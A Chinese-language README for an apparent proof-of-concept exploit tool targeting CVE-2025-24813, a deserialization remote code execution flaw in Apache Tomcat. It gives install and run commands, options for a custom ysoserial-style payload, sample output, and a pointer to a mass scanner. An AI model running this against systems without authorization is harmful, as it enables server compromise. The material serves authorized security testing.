
一个针对CVE-2025-24813的Python概念验证漏洞利用程序 - 通过恶意Java对象反序列化实现Apache Tomcat (v9.0.0-9.0.98/10.1.0-10.1.34/11.0.0-11.0.2)的未经身份验证的远程代码执行。包含安全检测模式和自定义载荷支持。
针对 Apache Tomcat 反序列化漏洞 (CVE-2025-24813) 的概念验证利用代码。该工具演示了攻击者如何利用 Tomcat 会话管理中的不安全反序列化。
警告:本工具仅用于授权的安全测试和教育目的。在未获得授权的情况下对不属于自己的系统使用本工具是违法的。
requestscoloramagit clone https://github.com/mattb709/CVE-2025-24813-PoC.git
cd CVE-2025-24813-PoC
pip install -r requirements.txt
基本用法:
python CVE-2025-24813-PoC.py -t 192.168.1.100 -p 8080
高级选项:
python CVE-2025-24813-PoC.py \
-t 10.0.0.1 \
-p 8443 \
--protocol https \
--no-verify \
--timeout 15
| 参数 | 描述 | 必填 |
|---|---|---|
-t, --target | 目标 IP 地址 | 是 |
-p, --port | 目标端口号 | 是 |
--protocol | http 或 https(默认:http) | 否 |
--no-verify | 禁用 SSL 证书验证 | 否 |
--timeout | 请求超时时间(秒,默认:10) | 否 |
[*] Apache Tomcat CVE-2025-24813 漏洞利用 PoC
[!] 警告:仅限授权测试。未经授权使用属违法行为。
[*] 目标:http://192.168.1.100:8080
[*] 载荷选项:
1. 使用默认虚拟载荷(安全,用于检测)
2. 输入自定义载荷(十六进制编码,例如来自 ysoserial)
[?] 请输入选项(1 或 2):1
[*] 正在使用默认虚拟载荷。
[*] 正在尝试利用...
[+] 成功:触发反序列化(HTTP 500)。若载荷为恶意,则可能实现 RCE!
用于批量扫描脆弱系统:
🔍 CVE-2025-24813-Scanner - 针对脆弱 Tomcat 主机的批量检测工具
如果您受此漏洞影响:
本软件基于 MIT 许可证提供。作者不对任何滥用此工具的行为负责。测试系统前请务必获得适当授权。
MIT 许可证 – 详见 LICENSE 文件。